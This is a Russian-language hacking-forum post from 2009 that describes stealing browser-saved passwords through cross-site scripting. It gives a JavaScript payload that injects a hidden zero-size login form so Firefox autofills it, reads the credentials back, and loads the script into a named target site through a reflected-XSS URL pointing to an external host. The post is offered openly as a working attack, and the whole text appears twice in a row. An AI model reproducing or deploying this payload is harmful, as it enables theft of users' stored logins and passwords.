paranoya
12.04.2009, 01:13
Раскручиваем Xss( вытаскиваем пароли )
Возможно для кого-то это не новость, но в паблике об этом я не читал, поэтому покажу что накопал.
Мы легко уводим из браузеров кукисы и различную информацию. Но хочется большего - паролей. И их можно получить. С помощью xss.
В браузерах есть такая фича, как запоминание паролей.
В разных браузерах механизм этого дела устроен по разному. Будем разбирать его на примере Firefox.
Как только загружается страница, проверяются сохраненные пароли для этого сайта. Если на странице есть подходящие формы, то они автоматически заполняются. А теперь - что нам мешает вытащить их с помощью xss? - ничего, что мы и делаем. Но ведь это довольно редкий случай, что на странице с xss есть форма логина. Идем дальше.
Создаем такую форму сами. И, о чудо - форма, которую мы создали с помощью xss, после загрузки заполнилась личными данными. Логином и паролем.
Разберем все на примере.
Возьмем подопытного из темы с пассивками.
http://web20.a.ua/slovo?query=[XSS]&stype=word
Смотрим форму.
Также заодно посмотрим куда можно вставить нашу форму.
получаем следующий код:
document.getElementById('radio').innerHTML = '<form action="?" method="POST"><input id="login" type="text" name="login" style="width: 0px; height: 0px; border: 0px"><input type="password" id="password" name="password" style="width: 0px; height: 0px; border: 0px"><input type='submit'></form>
interval = setInterval('check()', 100);
window.stop();
function check() {
l = document.getElementById('login').value;
p = document.getElementById('password').value;
if (l!='') {
alert(l+"/"+p);
}
}
Все это дело пишем в файл
http://web20.a.ua/slovo?query=<script src="host.ru/file.js"></script>&stype=word
и вуаля, получаем логин и пароль.
На Лисе данный баг работает на ура.
На ИЕ(6.0) и Опере - возможен только если пользователь сам заполнит поля. :(
В Chrome у меня вообще опция сохранения паролей не работает. а жаль...
Возможно для кого-то это не новость, но в паблике об этом я не читал, поэтому покажу что накопал.
Мы легко уводим из браузеров кукисы и различную информацию. Но хочется большего - паролей. И их можно получить. С помощью xss.
В браузерах есть такая фича, как запоминание паролей.
В разных браузерах механизм этого дела устроен по разному. Будем разбирать его на примере Firefox.
Как только загружается страница, проверяются сохраненные пароли для этого сайта. Если на странице есть подходящие формы, то они автоматически заполняются. А теперь - что нам мешает вытащить их с помощью xss? - ничего, что мы и делаем. Но ведь это довольно редкий случай, что на странице с xss есть форма логина. Идем дальше.
Создаем такую форму сами. И, о чудо - форма, которую мы создали с помощью xss, после загрузки заполнилась личными данными. Логином и паролем.
Разберем все на примере.
Возьмем подопытного из темы с пассивками.
http://web20.a.ua/slovo?query=[XSS]&stype=word
Смотрим форму.
Также заодно посмотрим куда можно вставить нашу форму.
получаем следующий код:
document.getElementById('radio').innerHTML = '<form action="?" method="POST"><input id="login" type="text" name="login" style="width: 0px; height: 0px; border: 0px"><input type="password" id="password" name="password" style="width: 0px; height: 0px; border: 0px"><input type='submit'></form>
interval = setInterval('check()', 100);
window.stop();
function check() {
l = document.getElementById('login').value;
p = document.getElementById('password').value;
if (l!='') {
alert(l+"/"+p);
}
}
Все это дело пишем в файл
http://web20.a.ua/slovo?query=<script src="host.ru/file.js"></script>&stype=word
и вуаля, получаем логин и пароль.
На Лисе данный баг работает на ура.
На ИЕ(6.0) и Опере - возможен только если пользователь сам заполнит поля. :(
В Chrome у меня вообще опция сохранения паролей не работает. а жаль...